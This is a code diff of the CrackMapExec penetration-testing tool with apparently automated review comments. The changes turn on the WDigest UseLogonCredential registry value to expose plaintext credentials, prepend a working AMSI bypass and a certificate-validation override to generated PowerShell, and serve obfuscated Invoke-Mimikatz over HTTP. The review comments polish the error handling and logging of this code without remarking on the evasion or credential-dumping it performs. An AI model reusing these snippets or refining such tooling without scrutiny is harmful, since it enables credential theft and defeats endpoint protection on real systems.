diff --git a/cme/connection.py b/cme/connection.py index b820d1f6..ea4bb077 100644 --- a/cme/connection.py +++ b/cme/connection.py @@ -211,10 +211,10 @@ class Connection: if not domain: domain = self.domain if self.args.domain: domain = self.args.domain - if credtype == 'hash' and not self.over_fail_limit(): + if credtype == 'hash' and not self.over_fail_limit(username): self.hash_login(domain, username, password) - elif credtype == 'plaintext' and not self.over_fail_limit(): + elif credtype == 'plaintext' and not self.over_fail_limit(username): self.plaintext_login(domain, username, password) except IndexError: diff --git a/cme/credentials/wdigest.py b/cme/credentials/wdigest.py index 32f45ca1..002441dc 100644 --- a/cme/credentials/wdigest.py +++ b/cme/credentials/wdigest.py @@ -22,7 +22,7 @@ class WDIGEST: ans = rrp.hBaseRegOpenKey(self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest') keyHandle = ans['phkResult'] - rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, '\x01\x00') + rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, 1) rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00') 
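Review bot: The new `over_fail_limit(username)` guard is evaluated separately in both branches of the credtype test, so the per-user lockout check now has to be maintained in two places. Hoisting it keeps the branches in step: `if not self.over_fail_limit(username):` followed by `if credtype == 'hash': self.hash_login(domain, username, password)` and `elif credtype == 'plaintext': self.plaintext_login(domain, username, password)`. The enclosing try block and method begin before the hunk and the `except IndexError:` handler continues after it.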
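Review bot: Neither `rrp.hBaseRegSetValue(...)` nor the readback `rrp.hBaseRegQueryValue(...)` on the last hunk line is guarded against `DCERPCException`, unlike the delete path later in this file, so an RPC failure propagates out of the method — presumably skipping whatever `remoteOps.finish()` cleanup the rest of the method performs, which starts before and continues after the hunk. The readback binds `rtype, data` but the hunk does not show them being checked; since this commit changed the written value's encoding, the method should compare `rtype == rrp.REG_DWORD` and the returned data with what was written before reporting the write as done.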
@@ -46,15 +46,26 @@ class WDIGEST: ans = rrp.hBaseRegOpenKey(self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest') keyHandle = ans['phkResult'] - rrp.hBaseRegDeleteValue(self.rrp, keyHandle, 'UseLogonCredential\x00') + try: + rrp.hBaseRegDeleteValue(self.rrp, keyHandle, 'UseLogonCredential\x00') + except: + self.logger.success('UseLogonCredential registry key not present') + + try: + remoteOps.finish() + except: + pass + + return try: #Check to make sure the reg key is actually deleted rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00') except DCERPCException: self.logger.success('UseLogonCredential registry key deleted successfully') + + try: + remoteOps.finish() + except: + pass - try: - remoteOps.finish() - except: - pass \ No newline at end of file diff --git a/cme/enum/users.py b/cme/enum/users.py index 863793ee..392c42ed 100644 --- a/cme/enum/users.py +++ b/cme/enum/users.py @@ -60,7 +60,7 @@ class SAMRDump: rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.set_dport(self.__port) - if hasattr(rpctransport, setRemoteHost): + if hasattr(rpctransport, 'setRemoteHost'): rpctransport.setRemoteHost(self.__addr) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. diff --git a/cme/helpers.py b/cme/helpers.py index 058f7231..9f1d2b07 100644 --- a/cme/helpers.py +++ b/cme/helpers.py @@ -3,6 +3,7 @@ import string import re import cme import os +import logging from base64 import b64encode from termcolor import colored 
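Review bot: The bare `except:` added around `rrp.hBaseRegDeleteValue(...)` treats every failure — access denied, a dropped RPC connection, even a KeyboardInterrupt — as proof that the value is absent and reports it through `logger.success`, so the operator gets a false "clean" result on the path whose purpose is to remove the credential-exposure setting. Catch `DCERPCException` (already in scope, it is used in the readback two lines later) and log the error text instead of a success line, leaving the readback as the only place that reports success. The two `remoteOps.finish()` blocks the hunk adds, one before the early `return` and one after the readback, are the same cleanup written twice and belong in a single `finally:`. The method signature and the `regHandle` setup lie above the hunk; the hunk ends the file.
```python
        try:
            try:
                rrp.hBaseRegDeleteValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
            except DCERPCException as e:
                # A failed delete is not proof of absence; surface the RPC error
                self.logger.error('Could not delete UseLogonCredential value: {}'.format(e))
                return
            # … unchanged: readback via hBaseRegQueryValue and the success log on DCERPCException …
        finally:
            # Best-effort cleanup; runs on both the early return and the normal path
            try:
                remoteOps.finish()
            except Exception:
                pass
```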
@@ -43,7 +44,15 @@ def obfs_ps_script(script, function_name=None): return strippedCode def create_ps_command(ps_command, force_ps32=False): - ps_command = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};" + ps_command + ps_command = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}; +try{{ +[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) +}}catch{{}} +{} +""".format(ps_command) + + logging.debug('Unincoded command:\n' + ps_command) + if force_ps32: command = """$command = '{}' if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64') diff --git a/cme/modules/mimikatz.py b/cme/modules/mimikatz.py index 2f9e8701..f6323c0e 100644 --- a/cme/modules/mimikatz.py +++ b/cme/modules/mimikatz.py @@ -55,7 +55,7 @@ class CMEModule: request.send_response(200) request.end_headers() - with open(get_ps_script('PowerSploit/Exfiltration/Invoke-Mimikatz.ps1'), 'r') as ps_script: + with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read(), self.obfs_name) request.wfile.write(ps_script)
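Review bot: `logging.debug('Unincoded command:\n' + ps_command)` writes the complete clear-text PowerShell command to the root logger; `ps_command` is built by callers and may carry credentials or other secrets, so debug-level log files become a place where they persist. Use a module logger with lazy formatting so the string is only assembled when debug output is enabled, and consider redacting or truncating it: `logger = logging.getLogger(__name__)` at module level and `logger.debug('Unencoded command:\n%s', ps_command)` here, which also fixes the "Unincoded" typo. The `{{`/`}}` escaping in the new template is correct for `str.format`, but a one-line comment above the triple-quoted string saying what the preamble changes would spare the next reader from decoding it. `create_ps_command` continues past the hunk, where the `force_ps32` branch wraps the result in a further template.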
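Review bot: Inside `with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script:` the context-manager variable is immediately rebound to the obfuscated text by `ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)`, so the file handle and its contents share one name for the rest of the block. A distinct name reads more clearly, e.g. `as script_file:` and `script_text = obfs_ps_script(script_file.read(), self.obfs_name)` followed by `request.wfile.write(script_text)`. The file is also opened in text mode with no explicit encoding, leaving decoding to the platform default; the request handler this sits in starts above the hunk.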